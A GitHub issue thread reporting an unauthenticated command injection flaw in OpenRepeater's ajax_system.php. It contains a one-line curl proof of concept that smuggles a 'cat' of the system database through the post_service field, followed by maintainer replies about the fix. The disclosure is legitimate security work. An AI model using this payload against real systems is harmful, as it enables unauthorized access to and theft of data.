OpenRepeater/openrepeater #66: Unauthenticated Command Injection Flaw

codexlynx, 2019-03-06:
An unauthenticated malicious actor can execute arbitrary system commands via "__functions/ajax_system.php__". This has a critical impact in the security of the system, for example
* Download system database:

> $ curl \<ADDRESS>/openrepeater/functions/ajax_system.php --data "post_service=;cat /var/lib/openrepeater/db/openrepeater.db" > openrepeater.db

The only limit is imagination. 

Regards!

alleghenycreative, 2019-04-19:
Just wanted to reply and acknowledge that we have seen this. I have tested and reproduced your results. While the chances of an attack on one of these setups is likely slim, we will be looking at ways to address this in a future release. Thanks for your diligence.

alleghenycreative, 2020-12-07:
This should be corrected/improved. The code inside the PHP file in now wrapped inside of a session check to ensure that the user is logged in before it will execute the code. Commit 3f31127 has been applied to 2.2.x branch.

closed 2020-12-07 by alleghenycreative